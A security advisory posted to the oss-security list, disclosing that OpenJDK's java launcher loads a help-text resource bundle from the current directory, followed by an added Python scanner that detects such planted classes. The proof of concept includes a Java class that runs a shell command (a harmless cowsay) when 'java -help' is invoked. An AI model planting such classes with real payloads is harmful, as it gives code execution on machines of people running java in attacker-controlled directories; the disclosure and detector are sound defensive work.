Date: Tue, 13 Jun 2017 17:23:13 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: OpenJDK: java(1): untrusted search path

Running "java -help" can load code from a subdirectory of cwd:

    $ javac launcher_en.java
    $ mkdir -p sun/launcher/resources/
    $ mv launcher_en.class sun/launcher/resources/
    $ java -help
     _______
    < pwned >
     -------
            \   ^__^
             \  (oo)\_______
                (__)\       )\/\
                    ||----w |
                    ||     ||

This happens because:

* By default (i.e. when the CLASSPATH env var is unset and neither -cp nor -jar
is specified), java sets "." as the user class path:
https://docs.oracle.com/javase/8/docs/technotes/tools/findingclasses.html#userclass

* The help message is apparently supposed to be internationalized.

* Java's localization machinery loads classes:
https://docs.oracle.com/javase/8/docs/api/java/util/ResourceBundle.html


On Debian systems, jarwrapper (a binfmt-misc thing for running executable jar 
files) is affected. It contains the following code:

    if java -d32 2>&1 | grep "does not support" > /dev/null; then
    ...

On 32-bit systems, this causes java to print the help message.

-- 
Jakub Wilk

package sun.launcher.resources;
import java.util.*;
public class launcher_en extends ListResourceBundle {
    public Object[][] getContents() {
        ProcessBuilder pb = new ProcessBuilder("sh", "-c", "cowsay pwned >/dev/tty");
        try {
            pb.start();
        } catch (Exception ex) {
            ex.printStackTrace();
        }
        Runtime.getRuntime().exit(1);
        return null;
    }
}
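
A defender-side check illustrating the mechanism described above (added example, not part of the original post or of OpenJDK/Debian): scan a directory that a java(1) wrapper might run in for .class files planted under JDK-internal package paths, and flag those shaped like the launcher's help-text resource bundle. The prefix list and the sample tree are assumptions constructed for this example.

```python
"""Scan a directory (e.g. the cwd a java(1) wrapper runs in) for .class files
planted under JDK-internal package paths, which the default "." class path
would make loadable. Example code; prefixes and sample tree are assumptions."""
import os
import tempfile

# Package prefixes a user class path should never supply. The JVM refuses
# user-defined java.* classes, but sun.* and jdk.* are not protected, which is
# what a planted sun.launcher.resources.launcher_en bundle relies on.
SUSPECT_PREFIXES = ("java/", "sun/", "jdk/", "com/sun/")


def find_planted_classes(root):
    """Return sorted, slash-separated relative paths of suspect .class files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".class"):
                continue
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            rel = rel.replace(os.sep, "/")
            if rel.startswith(SUSPECT_PREFIXES):
                hits.append(rel)
    return sorted(hits)


def looks_like_launcher_bundle(rel_path):
    """True when a hit matches the candidate names ResourceBundle tries for
    the launcher's help text (launcher, launcher_<lang>, launcher_<lang>_<cc>)."""
    return rel_path.startswith("sun/launcher/resources/launcher")


def build_sample_tree():
    """Constructed sample: one planted bundle plus one harmless top-level class.
    Files hold only the class-file magic, not real bytecode."""
    root = tempfile.mkdtemp(prefix="jscan-")
    planted = os.path.join(root, "sun", "launcher", "resources")
    os.makedirs(planted)
    for rel in ("sun/launcher/resources/launcher_en.class", "Main.class"):
        with open(os.path.join(root, *rel.split("/")), "wb") as fh:
            fh.write(b"\xca\xfe\xba\xbe")
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for hit in find_planted_classes(sample_root):
        tag = " (launcher resource bundle candidate)" if looks_like_launcher_bundle(hit) else ""
        print(hit + tag)
```

Running it against a real working directory (replace the sample root with the directory in question) reports anything the launcher's default class path could pick up before its own code runs.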
